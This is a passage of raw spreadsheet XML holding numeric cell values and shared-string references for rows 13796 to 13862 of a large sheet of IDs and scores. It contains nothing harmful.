        <v>10480</v>
      </c>
      <c r="F13795" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13796" ht="15.75" customHeight="1">
      <c r="A13796" s="1">
        <v>19115.0</v>
      </c>
      <c r="B13796" s="2">
        <v>5.4750154E7</v>
      </c>
      <c r="C13796" s="2" t="s">
        <v>13279</v>
      </c>
      <c r="D13796" s="2">
        <v>1.0</v>
      </c>
      <c r="E13796" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13796" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13797" ht="15.75" customHeight="1">
      <c r="A13797" s="1">
        <v>19296.0</v>
      </c>
      <c r="B13797" s="2">
        <v>5.5189675E7</v>
      </c>
      <c r="C13797" s="2" t="s">
        <v>13280</v>
      </c>
      <c r="D13797" s="2">
        <v>1.0</v>
      </c>
      <c r="E13797" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13797" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13798" ht="15.75" customHeight="1">
      <c r="A13798" s="1">
        <v>20267.0</v>
      </c>
      <c r="B13798" s="2">
        <v>1.1079282E7</v>
      </c>
      <c r="C13798" s="2" t="s">
        <v>13281</v>
      </c>
      <c r="D13798" s="2">
        <v>1.0</v>
      </c>
      <c r="E13798" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13798" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13799" ht="15.75" customHeight="1">
      <c r="A13799" s="1">
        <v>20407.0</v>
      </c>
      <c r="B13799" s="2">
        <v>1.2208326E7</v>
      </c>
      <c r="C13799" s="2" t="s">
        <v>13282</v>
      </c>
      <c r="D13799" s="2">
        <v>1.0</v>
      </c>
      <c r="E13799" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13799" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13800" ht="15.75" customHeight="1">
      <c r="A13800" s="1">
        <v>20990.0</v>
      </c>
      <c r="B13800" s="2">
        <v>1.7023587E7</v>
      </c>
      <c r="C13800" s="2" t="s">
        <v>13283</v>
      </c>
      <c r="D13800" s="2">
        <v>1.0</v>
      </c>
      <c r="E13800" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13800" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13801" ht="15.75" customHeight="1">
      <c r="A13801" s="1">
        <v>21045.0</v>
      </c>
      <c r="B13801" s="2">
        <v>1.769544E7</v>
      </c>
      <c r="C13801" s="2" t="s">
        <v>13284</v>
      </c>
      <c r="D13801" s="2">
        <v>1.0</v>
      </c>
      <c r="E13801" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13801" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13802" ht="15.75" customHeight="1">
      <c r="A13802" s="1">
        <v>21326.0</v>
      </c>
      <c r="B13802" s="2">
        <v>2.0974163E7</v>
      </c>
      <c r="C13802" s="2" t="s">
        <v>13285</v>
      </c>
      <c r="D13802" s="2">
        <v>1.0</v>
      </c>
      <c r="E13802" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13802" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13803" ht="15.75" customHeight="1">
      <c r="A13803" s="1">
        <v>21741.0</v>
      </c>
      <c r="B13803" s="2">
        <v>2.5890255E7</v>
      </c>
      <c r="C13803" s="2" t="s">
        <v>13286</v>
      </c>
      <c r="D13803" s="2">
        <v>1.0</v>
      </c>
      <c r="E13803" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13803" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13804" ht="15.75" customHeight="1">
      <c r="A13804" s="1">
        <v>21754.0</v>
      </c>
      <c r="B13804" s="2">
        <v>2.6062576E7</v>
      </c>
      <c r="C13804" s="2" t="s">
        <v>13287</v>
      </c>
      <c r="D13804" s="2">
        <v>1.0</v>
      </c>
      <c r="E13804" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13804" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13805" ht="15.75" customHeight="1">
      <c r="A13805" s="1">
        <v>21853.0</v>
      </c>
      <c r="B13805" s="2">
        <v>2.7181959E7</v>
      </c>
      <c r="C13805" s="2" t="s">
        <v>13288</v>
      </c>
      <c r="D13805" s="2">
        <v>1.0</v>
      </c>
      <c r="E13805" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13805" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13806" ht="15.75" customHeight="1">
      <c r="A13806" s="1">
        <v>21899.0</v>
      </c>
      <c r="B13806" s="2">
        <v>2.7877851E7</v>
      </c>
      <c r="C13806" s="2" t="s">
        <v>13289</v>
      </c>
      <c r="D13806" s="2">
        <v>1.0</v>
      </c>
      <c r="E13806" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13806" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13807" ht="15.75" customHeight="1">
      <c r="A13807" s="1">
        <v>21922.0</v>
      </c>
      <c r="B13807" s="2">
        <v>2.8409458E7</v>
      </c>
      <c r="C13807" s="2" t="s">
        <v>13290</v>
      </c>
      <c r="D13807" s="2">
        <v>1.0</v>
      </c>
      <c r="E13807" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13807" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13808" ht="15.75" customHeight="1">
      <c r="A13808" s="1">
        <v>22035.0</v>
      </c>
      <c r="B13808" s="2">
        <v>3.0192161E7</v>
      </c>
      <c r="C13808" s="2" t="s">
        <v>13291</v>
      </c>
      <c r="D13808" s="2">
        <v>1.0</v>
      </c>
      <c r="E13808" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13808" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13809" ht="15.75" customHeight="1">
      <c r="A13809" s="1">
        <v>22206.0</v>
      </c>
      <c r="B13809" s="2">
        <v>3.206164E7</v>
      </c>
      <c r="C13809" s="2" t="s">
        <v>13291</v>
      </c>
      <c r="D13809" s="2">
        <v>1.0</v>
      </c>
      <c r="E13809" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13809" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13810" ht="15.75" customHeight="1">
      <c r="A13810" s="1">
        <v>22439.0</v>
      </c>
      <c r="B13810" s="2">
        <v>3.6241809E7</v>
      </c>
      <c r="C13810" s="2" t="s">
        <v>13292</v>
      </c>
      <c r="D13810" s="2">
        <v>1.0</v>
      </c>
      <c r="E13810" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13810" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13811" ht="15.75" customHeight="1">
      <c r="A13811" s="1">
        <v>23507.0</v>
      </c>
      <c r="B13811" s="2">
        <v>5820486.0</v>
      </c>
      <c r="C13811" s="2" t="s">
        <v>13293</v>
      </c>
      <c r="D13811" s="2">
        <v>1.0</v>
      </c>
      <c r="E13811" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13811" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13812" ht="15.75" customHeight="1">
      <c r="A13812" s="1">
        <v>23689.0</v>
      </c>
      <c r="B13812" s="2">
        <v>7020051.0</v>
      </c>
      <c r="C13812" s="2" t="s">
        <v>13283</v>
      </c>
      <c r="D13812" s="2">
        <v>1.0</v>
      </c>
      <c r="E13812" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13812" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13813" ht="15.75" customHeight="1">
      <c r="A13813" s="1">
        <v>25378.0</v>
      </c>
      <c r="B13813" s="2">
        <v>1.3640549E7</v>
      </c>
      <c r="C13813" s="2" t="s">
        <v>13294</v>
      </c>
      <c r="D13813" s="2">
        <v>1.0</v>
      </c>
      <c r="E13813" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13813" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13814" ht="15.75" customHeight="1">
      <c r="A13814" s="1">
        <v>25477.0</v>
      </c>
      <c r="B13814" s="2">
        <v>1.4015943E7</v>
      </c>
      <c r="C13814" s="2" t="s">
        <v>13295</v>
      </c>
      <c r="D13814" s="2">
        <v>1.0</v>
      </c>
      <c r="E13814" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13814" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13815" ht="15.75" customHeight="1">
      <c r="A13815" s="1">
        <v>25644.0</v>
      </c>
      <c r="B13815" s="2">
        <v>1.4518186E7</v>
      </c>
      <c r="C13815" s="2" t="s">
        <v>13296</v>
      </c>
      <c r="D13815" s="2">
        <v>1.0</v>
      </c>
      <c r="E13815" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13815" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13816" ht="15.75" customHeight="1">
      <c r="A13816" s="1">
        <v>26156.0</v>
      </c>
      <c r="B13816" s="2">
        <v>1.608348E7</v>
      </c>
      <c r="C13816" s="2" t="s">
        <v>13297</v>
      </c>
      <c r="D13816" s="2">
        <v>1.0</v>
      </c>
      <c r="E13816" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13816" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13817" ht="15.75" customHeight="1">
      <c r="A13817" s="1">
        <v>26438.0</v>
      </c>
      <c r="B13817" s="2">
        <v>1.7251929E7</v>
      </c>
      <c r="C13817" s="2" t="s">
        <v>13298</v>
      </c>
      <c r="D13817" s="2">
        <v>1.0</v>
      </c>
      <c r="E13817" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13817" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13818" ht="15.75" customHeight="1">
      <c r="A13818" s="1">
        <v>27219.0</v>
      </c>
      <c r="B13818" s="2">
        <v>2.0974162E7</v>
      </c>
      <c r="C13818" s="2" t="s">
        <v>13299</v>
      </c>
      <c r="D13818" s="2">
        <v>1.0</v>
      </c>
      <c r="E13818" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13818" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13819" ht="15.75" customHeight="1">
      <c r="A13819" s="1">
        <v>27497.0</v>
      </c>
      <c r="B13819" s="2">
        <v>2.2067601E7</v>
      </c>
      <c r="C13819" s="2" t="s">
        <v>13300</v>
      </c>
      <c r="D13819" s="2">
        <v>1.0</v>
      </c>
      <c r="E13819" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13819" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13820" ht="15.75" customHeight="1">
      <c r="A13820" s="1">
        <v>28639.0</v>
      </c>
      <c r="B13820" s="2">
        <v>2.7304328E7</v>
      </c>
      <c r="C13820" s="2" t="s">
        <v>13301</v>
      </c>
      <c r="D13820" s="2">
        <v>1.0</v>
      </c>
      <c r="E13820" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13820" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13821" ht="15.75" customHeight="1">
      <c r="A13821" s="1">
        <v>28977.0</v>
      </c>
      <c r="B13821" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C13821" s="2" t="s">
        <v>13302</v>
      </c>
      <c r="D13821" s="2">
        <v>1.0</v>
      </c>
      <c r="E13821" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13821" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13822" ht="15.75" customHeight="1">
      <c r="A13822" s="1">
        <v>29001.0</v>
      </c>
      <c r="B13822" s="2">
        <v>2.9866534E7</v>
      </c>
      <c r="C13822" s="2" t="s">
        <v>13303</v>
      </c>
      <c r="D13822" s="2">
        <v>1.0</v>
      </c>
      <c r="E13822" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13822" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13823" ht="15.75" customHeight="1">
      <c r="A13823" s="1">
        <v>29273.0</v>
      </c>
      <c r="B13823" s="2">
        <v>3.0994721E7</v>
      </c>
      <c r="C13823" s="2" t="s">
        <v>13304</v>
      </c>
      <c r="D13823" s="2">
        <v>1.0</v>
      </c>
      <c r="E13823" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13823" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13824" ht="15.75" customHeight="1">
      <c r="A13824" s="1">
        <v>29409.0</v>
      </c>
      <c r="B13824" s="2">
        <v>3.2061639E7</v>
      </c>
      <c r="C13824" s="2" t="s">
        <v>13291</v>
      </c>
      <c r="D13824" s="2">
        <v>1.0</v>
      </c>
      <c r="E13824" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13824" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13825" ht="15.75" customHeight="1">
      <c r="A13825" s="1">
        <v>29777.0</v>
      </c>
      <c r="B13825" s="2">
        <v>3.5006535E7</v>
      </c>
      <c r="C13825" s="2" t="s">
        <v>13305</v>
      </c>
      <c r="D13825" s="2">
        <v>1.0</v>
      </c>
      <c r="E13825" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13825" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13826" ht="15.75" customHeight="1">
      <c r="A13826" s="1">
        <v>30269.0</v>
      </c>
      <c r="B13826" s="2">
        <v>3.7685835E7</v>
      </c>
      <c r="C13826" s="2" t="s">
        <v>13306</v>
      </c>
      <c r="D13826" s="2">
        <v>1.0</v>
      </c>
      <c r="E13826" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13826" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13827" ht="15.75" customHeight="1">
      <c r="A13827" s="1">
        <v>30312.0</v>
      </c>
      <c r="B13827" s="2">
        <v>3.8007842E7</v>
      </c>
      <c r="C13827" s="2" t="s">
        <v>13307</v>
      </c>
      <c r="D13827" s="2">
        <v>1.0</v>
      </c>
      <c r="E13827" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13827" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13828" ht="15.75" customHeight="1">
      <c r="A13828" s="1">
        <v>30335.0</v>
      </c>
      <c r="B13828" s="2">
        <v>3.8138261E7</v>
      </c>
      <c r="C13828" s="2" t="s">
        <v>13308</v>
      </c>
      <c r="D13828" s="2">
        <v>1.0</v>
      </c>
      <c r="E13828" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13828" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13829" ht="15.75" customHeight="1">
      <c r="A13829" s="1">
        <v>31044.0</v>
      </c>
      <c r="B13829" s="2">
        <v>4.7884823E7</v>
      </c>
      <c r="C13829" s="2" t="s">
        <v>13309</v>
      </c>
      <c r="D13829" s="2">
        <v>1.0</v>
      </c>
      <c r="E13829" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13829" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13830" ht="15.75" customHeight="1">
      <c r="A13830" s="1">
        <v>31461.0</v>
      </c>
      <c r="B13830" s="2">
        <v>5.0418569E7</v>
      </c>
      <c r="C13830" s="2" t="s">
        <v>13310</v>
      </c>
      <c r="D13830" s="2">
        <v>1.0</v>
      </c>
      <c r="E13830" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13830" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13831" ht="15.75" customHeight="1">
      <c r="A13831" s="1">
        <v>32904.0</v>
      </c>
      <c r="B13831" s="2">
        <v>6396131.0</v>
      </c>
      <c r="C13831" s="2" t="s">
        <v>13311</v>
      </c>
      <c r="D13831" s="2">
        <v>1.0</v>
      </c>
      <c r="E13831" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13831" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13832" ht="15.75" customHeight="1">
      <c r="A13832" s="1">
        <v>33502.0</v>
      </c>
      <c r="B13832" s="2">
        <v>8060782.0</v>
      </c>
      <c r="C13832" s="2" t="s">
        <v>13312</v>
      </c>
      <c r="D13832" s="2">
        <v>1.0</v>
      </c>
      <c r="E13832" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13832" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13833" ht="15.75" customHeight="1">
      <c r="A13833" s="1">
        <v>33717.0</v>
      </c>
      <c r="B13833" s="2">
        <v>8512122.0</v>
      </c>
      <c r="C13833" s="2" t="s">
        <v>13313</v>
      </c>
      <c r="D13833" s="2">
        <v>1.0</v>
      </c>
      <c r="E13833" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13833" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13834" ht="15.75" customHeight="1">
      <c r="A13834" s="1">
        <v>34187.0</v>
      </c>
      <c r="B13834" s="2">
        <v>9956979.0</v>
      </c>
      <c r="C13834" s="2" t="s">
        <v>13314</v>
      </c>
      <c r="D13834" s="2">
        <v>1.0</v>
      </c>
      <c r="E13834" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13834" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="13835" ht="15.75" customHeight="1">
      <c r="A13835" s="1">
        <v>591.0</v>
      </c>
      <c r="B13835" s="2">
        <v>1.9187921E7</v>
      </c>
      <c r="C13835" s="2" t="s">
        <v>13315</v>
      </c>
      <c r="D13835" s="2">
        <v>1.0</v>
      </c>
      <c r="E13835" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13835" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="13836" ht="15.75" customHeight="1">
      <c r="A13836" s="1">
        <v>5538.0</v>
      </c>
      <c r="B13836" s="2">
        <v>4.591454E7</v>
      </c>
      <c r="C13836" s="2" t="s">
        <v>13316</v>
      </c>
      <c r="D13836" s="2">
        <v>1.0</v>
      </c>
      <c r="E13836" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13836" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="13837" ht="15.75" customHeight="1">
      <c r="A13837" s="1">
        <v>7870.0</v>
      </c>
      <c r="B13837" s="2">
        <v>5.2401092E7</v>
      </c>
      <c r="C13837" s="2" t="s">
        <v>13317</v>
      </c>
      <c r="D13837" s="2">
        <v>1.0</v>
      </c>
      <c r="E13837" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13837" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="13838" ht="15.75" customHeight="1">
      <c r="A13838" s="1">
        <v>20436.0</v>
      </c>
      <c r="B13838" s="2">
        <v>1.2382768E7</v>
      </c>
      <c r="C13838" s="2" t="s">
        <v>13318</v>
      </c>
      <c r="D13838" s="2">
        <v>1.0</v>
      </c>
      <c r="E13838" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13838" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="13839" ht="15.75" customHeight="1">
      <c r="A13839" s="1">
        <v>29824.0</v>
      </c>
      <c r="B13839" s="2">
        <v>3.5313604E7</v>
      </c>
      <c r="C13839" s="2" t="s">
        <v>13319</v>
      </c>
      <c r="D13839" s="2">
        <v>1.0</v>
      </c>
      <c r="E13839" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13839" s="2">
        <v>0.095679012345679</v>
      </c>
    </row>
    <row r="13840" ht="15.75" customHeight="1">
      <c r="A13840" s="1">
        <v>1293.0</v>
      </c>
      <c r="B13840" s="2">
        <v>2.5593249E7</v>
      </c>
      <c r="C13840" s="2" t="s">
        <v>13320</v>
      </c>
      <c r="D13840" s="2">
        <v>1.0</v>
      </c>
      <c r="E13840" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13840" s="2">
        <v>0.09508547008547005</v>
      </c>
    </row>
    <row r="13841" ht="15.75" customHeight="1">
      <c r="A13841" s="1">
        <v>7689.0</v>
      </c>
      <c r="B13841" s="2">
        <v>5.1952393E7</v>
      </c>
      <c r="C13841" s="2" t="s">
        <v>13321</v>
      </c>
      <c r="D13841" s="2">
        <v>1.0</v>
      </c>
      <c r="E13841" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13841" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="13842" ht="15.75" customHeight="1">
      <c r="A13842" s="1">
        <v>9126.0</v>
      </c>
      <c r="B13842" s="2">
        <v>5.5226158E7</v>
      </c>
      <c r="C13842" s="2" t="s">
        <v>13322</v>
      </c>
      <c r="D13842" s="2">
        <v>1.0</v>
      </c>
      <c r="E13842" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13842" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="13843" ht="15.75" customHeight="1">
      <c r="A13843" s="1">
        <v>14059.0</v>
      </c>
      <c r="B13843" s="2">
        <v>3.7559926E7</v>
      </c>
      <c r="C13843" s="2" t="s">
        <v>13323</v>
      </c>
      <c r="D13843" s="2">
        <v>1.0</v>
      </c>
      <c r="E13843" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13843" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="13844" ht="15.75" customHeight="1">
      <c r="A13844" s="1">
        <v>14217.0</v>
      </c>
      <c r="B13844" s="2">
        <v>3.8283999E7</v>
      </c>
      <c r="C13844" s="2" t="s">
        <v>13324</v>
      </c>
      <c r="D13844" s="2">
        <v>1.0</v>
      </c>
      <c r="E13844" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13844" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="13845" ht="15.75" customHeight="1">
      <c r="A13845" s="1">
        <v>16611.0</v>
      </c>
      <c r="B13845" s="2">
        <v>4.7058091E7</v>
      </c>
      <c r="C13845" s="2" t="s">
        <v>13325</v>
      </c>
      <c r="D13845" s="2">
        <v>1.0</v>
      </c>
      <c r="E13845" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13845" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="13846" ht="15.75" customHeight="1">
      <c r="A13846" s="1">
        <v>17123.0</v>
      </c>
      <c r="B13846" s="2">
        <v>4.8802057E7</v>
      </c>
      <c r="C13846" s="2" t="s">
        <v>13326</v>
      </c>
      <c r="D13846" s="2">
        <v>1.0</v>
      </c>
      <c r="E13846" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13846" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="13847" ht="15.75" customHeight="1">
      <c r="A13847" s="1">
        <v>18053.0</v>
      </c>
      <c r="B13847" s="2">
        <v>5.1586239E7</v>
      </c>
      <c r="C13847" s="2" t="s">
        <v>13327</v>
      </c>
      <c r="D13847" s="2">
        <v>1.0</v>
      </c>
      <c r="E13847" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13847" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="13848" ht="15.75" customHeight="1">
      <c r="A13848" s="1">
        <v>21281.0</v>
      </c>
      <c r="B13848" s="2">
        <v>2.0359603E7</v>
      </c>
      <c r="C13848" s="2" t="s">
        <v>13328</v>
      </c>
      <c r="D13848" s="2">
        <v>1.0</v>
      </c>
      <c r="E13848" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13848" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="13849" ht="15.75" customHeight="1">
      <c r="A13849" s="1">
        <v>22147.0</v>
      </c>
      <c r="B13849" s="2">
        <v>3.1264031E7</v>
      </c>
      <c r="C13849" s="2" t="s">
        <v>13329</v>
      </c>
      <c r="D13849" s="2">
        <v>1.0</v>
      </c>
      <c r="E13849" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13849" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="13850" ht="15.75" customHeight="1">
      <c r="A13850" s="1">
        <v>23436.0</v>
      </c>
      <c r="B13850" s="2">
        <v>5659998.0</v>
      </c>
      <c r="C13850" s="2" t="s">
        <v>13330</v>
      </c>
      <c r="D13850" s="2">
        <v>1.0</v>
      </c>
      <c r="E13850" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13850" s="2">
        <v>0.09477124183006533</v>
      </c>
    </row>
    <row r="13851" ht="15.75" customHeight="1">
      <c r="A13851" s="1">
        <v>31852.0</v>
      </c>
      <c r="B13851" s="2">
        <v>5.2758669E7</v>
      </c>
      <c r="C13851" s="2" t="s">
        <v>12736</v>
      </c>
      <c r="D13851" s="2">
        <v>1.0</v>
      </c>
      <c r="E13851" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13851" s="2">
        <v>0.09454191033138402</v>
      </c>
    </row>
    <row r="13852" ht="15.75" customHeight="1">
      <c r="A13852" s="1">
        <v>1651.0</v>
      </c>
      <c r="B13852" s="2">
        <v>2.811676E7</v>
      </c>
      <c r="C13852" s="2" t="s">
        <v>13331</v>
      </c>
      <c r="D13852" s="2">
        <v>1.0</v>
      </c>
      <c r="E13852" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13852" s="2">
        <v>0.09424603174603176</v>
      </c>
    </row>
    <row r="13853" ht="15.75" customHeight="1">
      <c r="A13853" s="1">
        <v>9868.0</v>
      </c>
      <c r="B13853" s="2">
        <v>5.6727146E7</v>
      </c>
      <c r="C13853" s="2" t="s">
        <v>13332</v>
      </c>
      <c r="D13853" s="2">
        <v>1.0</v>
      </c>
      <c r="E13853" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13853" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="13854" ht="15.75" customHeight="1">
      <c r="A13854" s="1">
        <v>18784.0</v>
      </c>
      <c r="B13854" s="2">
        <v>5.3825667E7</v>
      </c>
      <c r="C13854" s="2" t="s">
        <v>13333</v>
      </c>
      <c r="D13854" s="2">
        <v>1.0</v>
      </c>
      <c r="E13854" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13854" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="13855" ht="15.75" customHeight="1">
      <c r="A13855" s="1">
        <v>24871.0</v>
      </c>
      <c r="B13855" s="2">
        <v>1.2209559E7</v>
      </c>
      <c r="C13855" s="2" t="s">
        <v>13334</v>
      </c>
      <c r="D13855" s="2">
        <v>1.0</v>
      </c>
      <c r="E13855" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13855" s="2">
        <v>0.09424603174603174</v>
      </c>
    </row>
    <row r="13856" ht="15.75" customHeight="1">
      <c r="A13856" s="1">
        <v>2303.0</v>
      </c>
      <c r="B13856" s="2">
        <v>3.2724081E7</v>
      </c>
      <c r="C13856" s="2" t="s">
        <v>13335</v>
      </c>
      <c r="D13856" s="2">
        <v>1.0</v>
      </c>
      <c r="E13856" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13856" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="13857" ht="15.75" customHeight="1">
      <c r="A13857" s="1">
        <v>4973.0</v>
      </c>
      <c r="B13857" s="2">
        <v>4.4102811E7</v>
      </c>
      <c r="C13857" s="2" t="s">
        <v>13336</v>
      </c>
      <c r="D13857" s="2">
        <v>1.0</v>
      </c>
      <c r="E13857" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13857" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="13858" ht="15.75" customHeight="1">
      <c r="A13858" s="1">
        <v>19119.0</v>
      </c>
      <c r="B13858" s="2">
        <v>5.4753943E7</v>
      </c>
      <c r="C13858" s="2" t="s">
        <v>13337</v>
      </c>
      <c r="D13858" s="2">
        <v>1.0</v>
      </c>
      <c r="E13858" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13858" s="2">
        <v>0.09424603174603173</v>
      </c>
    </row>
    <row r="13859" ht="15.75" customHeight="1">
      <c r="A13859" s="1">
        <v>9498.0</v>
      </c>
      <c r="B13859" s="2">
        <v>5.5919638E7</v>
      </c>
      <c r="C13859" s="2" t="s">
        <v>13338</v>
      </c>
      <c r="D13859" s="2">
        <v>1.0</v>
      </c>
      <c r="E13859" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13859" s="2">
        <v>0.09424603174603172</v>
      </c>
    </row>
    <row r="13860" ht="15.75" customHeight="1">
      <c r="A13860" s="1">
        <v>2262.0</v>
      </c>
      <c r="B13860" s="2">
        <v>3.2414025E7</v>
      </c>
      <c r="C13860" s="2" t="s">
        <v>13339</v>
      </c>
      <c r="D13860" s="2">
        <v>1.0</v>
      </c>
      <c r="E13860" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13860" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="13861" ht="15.75" customHeight="1">
      <c r="A13861" s="1">
        <v>7175.0</v>
      </c>
      <c r="B13861" s="2">
        <v>5.0556703E7</v>
      </c>
      <c r="C13861" s="2" t="s">
        <v>13340</v>
      </c>
      <c r="D13861" s="2">
        <v>1.0</v>
      </c>
      <c r="E13861" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13861" s="2">
        <v>0.09393939393939396</v>
      </c>
    </row>
    <row r="13862" ht="15.75" customHeight="1">
      <c r="A13862" s="1">
        <v>820.0</v>
      </c>
      <c r="B13862" s="2">
        <v>2.1491997E7</v>
      </c>
      <c r="C13862" s="2" t="s">
        <v>13341</v>
      </c>
      <c r="D13862" s="2">
        <v>1.0</v>
      </c>
      <c r="E13862" s="3" t="s">
        <v>10480</v>
      </c>
